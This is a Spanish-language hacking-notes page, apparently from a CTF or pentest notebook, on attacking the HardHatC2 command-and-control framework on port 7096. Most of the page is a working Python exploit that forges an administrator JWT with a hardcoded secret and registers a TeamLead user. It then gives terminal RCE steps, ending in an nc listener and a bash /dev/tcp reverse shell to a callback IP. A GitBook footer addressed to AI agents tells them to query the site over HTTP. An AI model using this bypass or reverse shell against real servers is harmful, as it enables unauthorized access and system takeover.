> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/ports-and-services/hardhatc2-7096.md).

# HardHatC2 - 7096

{% hint style="info" %}
HardHatC2 es un framework de comando y control (C2) para múltiples usuarios basado en C# y .NET, diseñado para ejercicios de red team y pruebas de penetración. Incluye un Team Server de ASP.NET, un cliente Blazor .NET e implantes C# integrados, con soporte para implantes de terceros en otros lenguajes.
{% endhint %}

<figure><img src="/files/461ac046348d5046fd70c12f33c2f1e942108323" alt=""><figcaption></figcaption></figure>

## **Omisión de autenticación en HardHat C2**

{% embed url="<https://blog.sth.sh/hardhatc2-0-days-rce-authn-bypass-96ba683d9dd7>" %}

Usa el siguiente script para omitir la autenticación y crear un nuevo usuario:

```python
import jwt  
import datetime  
import uuid  
import requests  
  
rhost = '127.0.0.1:5000'  
  
# Generar JWT de administrador  
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"  
issuer = "hardhatc2.com"  
now = datetime.datetime.utcnow()  
  
expiration = now + datetime.timedelta(days=28)  
payload = {  
"sub": "HardHat_Admin",  
"jti": str(uuid.uuid4()),  
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1",  
"iss": issuer,  
"aud": issuer,  
"iat": int(now.timestamp()),  
"exp": int(expiration.timestamp()),  
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator"  
}  
  
token = jwt.encode(payload, secret, algorithm="HS256")  
print("JWT generado:")  
print(token)  
  
# Usa el JWT de administrador para crear un nuevo usuario 'sth_pentest' como TeamLead  
burp0_url = f"https://{rhost}/Login/Register"  
burp0_headers = {  
"Authorization": f"Bearer {token}",  
"Content-Type": "application/json"  
}  
burp0_json = {  
"password": "jordan12345",  
"role": "TeamLead",  
"username": "jordan"  
}  
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)  
print(r.text)
```

El script genera el `usuario` con el `rol de TeamLead` .

<figure><img src="/files/7be29e784f9582e24cfe3b4b36254b1d5e9243a0" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/6549ee78f30256f9f3fb16a26a764a01abeaf047" alt=""><figcaption></figcaption></figure>

## Ejecución remota de código (RCE) en HardHat C2

En el `ImplantInteract` sección, el acceso a terminal está disponible. Al ejecutar `whoami` muestra que el usuario actual es `sergej`.

<figure><img src="/files/0931b48a81af447bf9a5e6ea64cfc57d5f1260fa" alt=""><figcaption></figcaption></figure>

Establece una shell inversa como `sergej` mientras escuchas en el puerto 443:

```bash
nc -nlvp 443
```

Ejecuta el siguiente comando para iniciar la conexión inversa:

```bash
bash -c "bash -i >& /dev/tcp/10.10.14.163/443 0>&1"
```

<figure><img src="/files/4f06288741e9730e8ed9447ee5c277aa7725dde0" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/ports-and-services/hardhatc2-7096.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
